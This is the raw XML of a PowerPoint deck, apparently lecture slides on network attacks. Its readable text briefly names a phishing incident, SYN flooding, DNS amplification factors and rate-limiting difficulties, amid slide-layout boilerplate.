          <p:cNvPr id="10854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tLang="en-US"/>
              <a:t>Phishing attack on Melbourne IT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108548" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4EAD772A-5F94-4E23-B345-B11B1B4BF826}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3574523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p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10957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tLang="en-US"/>
              <a:t>Typical header size 20 bytes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109572" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E8F1964F-6D59-47C5-A897-6A45DFE43473}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3558865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p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11059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tLang="en-US"/>
              <a:t>SYN / SYN-ACK opening too many connections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110596" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6BEA16D3-5880-4D25-9EC2-C25717F02602}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1181119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tLang="en-US"/>
              <a:t>Large TXT field; forgeability  UDP  addresses, the availability of open resolvers, and the asymmetry of DNS requests and responses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111620" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D3C653EF-8247-4E98-AE3A-144F3D5401B8}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="44501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p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11264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TCP for &gt; 512 bytes, DNSSEC keys, TXT field</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112644" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7D923B1C-272D-4953-A445-F9FA17027168}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4096490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p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11366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tLang="en-US"/>
              <a:t>Rate limiting is hard due to proxies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113668" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6DFBC77A-5949-4488-8386-2F029CA4703E}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2574503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Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{10896D01-4E6E-434F-87F3-36838B23BDC9}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>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Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>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4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{87BD403C-4B37-4563-AB22-6B6A60673660}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{A8E4993E-7D48-4E83-9628-1DF979082941}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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a:t>Click to edit Master title style</a:t>
            </a:r>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Text Box 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{0DE75877-BB73-4145-9626-8915951ECF1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218145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1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{0B2BED60-7A5C-F143-8A92-E9401321A5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9302297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Text Box 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{E96055D0-EF50-F34B-8E0C-1452C965461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9865790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71500" y="1968500"/>
            <a:ext cx="5988050" cy="7785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711950" y="1968500"/>
            <a:ext cx="5988050" cy="7785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Box 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{51160DEC-357C-B64A-9C44-AB200C29189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2312428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Box 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{81D8D0C3-1483-E742-AA92-DF3E94C1711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1755676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Box 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{41A633EA-985A-CD4C-B0E7-D316B828699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85104999"/>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1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{49C6761F-20D3-834E-8440-A44DECD3B7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19807206"/>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Box 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CCFC7E97-56FE-0646-8FC1-C39A7C39F24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0619337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Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>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4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{89E0EE4D-D958-49AF-95A4-DA37BF611498}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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Arial"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Box 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{9696AB3C-036F-2946-B740-457C6E4631D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216483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1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{443E0D3B-E55E-3848-909F-EC7BD0E4B60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36921933"/>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04375" y="0"/>
            <a:ext cx="3095625" cy="9753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17500" y="0"/>
            <a:ext cx="9134475" cy="975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1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{08319D1B-D3C7-B744-AECD-ADC80398198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4515261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a:t>Click to edit Master title style</a:t>
            </a:r>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Text Box 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{0DE75877-BB73-4145-9626-8915951ECF1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78375435"/>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1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{0B2BED60-7A5C-F143-8A92-E9401321A5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0068903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Text Box 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{E96055D0-EF50-F34B-8E0C-1452C965461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89731413"/>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71500" y="1968500"/>
            <a:ext cx="5988050" cy="7785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711950" y="1968500"/>
            <a:ext cx="5988050" cy="7785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Box 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{51160DEC-357C-B64A-9C44-AB200C29189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6919651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Box 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{81D8D0C3-1483-E742-AA92-DF3E94C1711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33241773"/>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Box 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{41A633EA-985A-CD4C-B0E7-D316B828699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15096013"/>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1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{49C6761F-20D3-834E-8440-A44DECD3B7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8203417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Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{41546729-F455-404F-AD3B-2EC799F1E8F7}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" alt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Box 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CCFC7E97-56FE-0646-8FC1-C39A7C39F24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05775069"/>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Arial"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Box 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{9696AB3C-036F-2946-B740-457C6E4631D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98205894"/>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1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{443E0D3B-E55E-3848-909F-EC7BD0E4B60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261776"/>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04375" y="0"/>
            <a:ext cx="3095625" cy="9753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17500" y="0"/>
            <a:ext cx="9134475" cy="975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1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{08319D1B-D3C7-B744-AECD-ADC80398198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2082296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Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>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Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{10B5D991-A853-49E3-8325-02084B9CA90C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{C05207E6-17E2-4BD8-AB38-A57CACB7D13C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{EF074F40-0288-4C5F-AB41-1DBAAA66236C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
